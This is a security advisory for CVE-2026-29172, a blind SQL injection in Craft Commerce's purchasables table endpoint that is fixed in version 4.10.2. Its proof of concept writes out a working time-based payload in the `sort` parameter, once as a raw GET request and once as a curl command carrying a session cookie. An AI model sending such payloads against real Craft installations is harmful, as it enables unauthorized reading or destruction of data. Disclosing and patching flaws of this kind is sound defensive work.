CVE-2026-29172

Description

## Summary Craft Commerce is vulnerable to **SQL Injection** in the purchasables table endpoint. The `sort` parameter is split by `|` and the first part (column name) is passed directly as an array key to `orderBy()` without whitelist validation. Yii2's query builder does **NOT** escape array keys, allowing an authenticated attacker to inject arbitrary SQL into the `ORDER BY` clause. --- ## PoC ### Required Permissions - General - Access the control panel - Access Craft Commerce - Craft Commerce - Manage orders - Edit orders ### Steps to reproduce 1. Log in to the control panel 2. Navigate to **Commerce** > **Orders** > Create a new order 3. Click on "Add a line item" to show the purchasables table 4. Intercept the AJAX request and modify the `sort` parameter as follows: ```http GET /index.php?p=admin/actions/commerce/orders/purchasables-table&siteId=1&sort=id,(SELECT%20SLEEP(2))|asc ``` 5. Observe the delay in the response, confirming the injection Alternatively, you can use the following `curl` (bash syntax) command (replace cookie and target domain as needed): ```bash curl --path-as-is -k -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json, text/plain, */*' -b $'<Cookie>' $'http://craft.local/index.php?p=admin%2Factions%2Fcommerce%2Forders%2Fpurchasables-table&siteId=1&sort=id,(SELECT%20SLEEP(5))|asc' ``` ### Impact With this Blind SQLi, an attacker can: - **Exfiltrate data** character-by-character (same technique as [GHSA-pmgj-gmm4-jh6j](https://github.com/craftcms/commerce/security/advisories/GHSA-pmgj-gmm4-jh6j)). - **Modify or destroy data** (drop tables, update records, alter schema).

How to fix CVE-2026-29172

To remediate CVE-2026-29172, upgrade the affected package to a fixed version below.

• —upgrade to 4.10.2 or later

Is CVE-2026-29172 being exploited?

Low — EPSS is 0.0%, meaning exploitation activity has not been observed at scale.

Affected packages (1)